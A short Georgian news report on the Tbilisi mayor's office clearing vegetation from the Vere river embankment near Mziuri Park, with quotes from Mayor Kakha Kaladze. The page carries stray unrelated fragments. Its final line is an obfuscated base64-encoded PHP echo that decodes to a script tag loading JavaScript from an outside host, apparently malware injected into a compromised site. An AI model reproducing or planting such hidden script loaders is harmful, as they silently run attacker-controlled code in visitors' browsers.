celsiusi
ავერსი შნაიდერი

 „მზიურის პარკის“ მიმდებარედ, მდინარე ვერეს ნაპირსამაგრის გაწმენდის სამუშაოები მიმდინარეობს.

თბილისის მერიის შპს „ეკოსერვის ჯგუფის“ თანამშრომლები მდინარე ვერეს ნაპირზე, ერთ ჰექტრამდე ფართობის ტერიტორიას ლელქაშისაგან და ამონაყრისაგან ასუფთავებენ. აღნიშნული სამუშაოების ნაწილი უკვე შესრულებულია.

სამუშაოების ფარგლებში, ასევე მოიჭრა მდინარის ნაპირზე არსებული დაზიანებული ხე- მცენარეები. აღნიშნულ სამუშაოებს თბილისის მერი კახა კალაძე მოადგილეებთან ანდრია ბასილაიასთან და ირაკლი ბენდელიანთან ერთად ადგილზე გაეცნო.

„იწმინდება მდინარე ვერეს კალაპოტი, რომელიც სავსე იყო ხე-მცენარეებით. სრულად გაიწმინდება კალაპოტი, რომ უამინდობის შემთხვევაში პრობლემები არ შეიქმნას. კონკრეტულ მონაკვეთზე სამუშაოები რამდენიმე დღეში დასრულდება, შემდეგ გადავალთ მომდევნო მონაკვეთზე. აღნიშნული სამუშაოები ყოველ გაზაფხულზე ტარდება“, – განაცხადა კახა კალაძემ.

კახა კალაძესთან ერთად, ადგილზე იმყოფებოდნენ ვაკის რაიონის გამგებელი დავით კვინიკაძე და შპს „ეკოსერვის ჯგუფის“ დირექტორი ვახტანგ ნოზაძე.

175
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");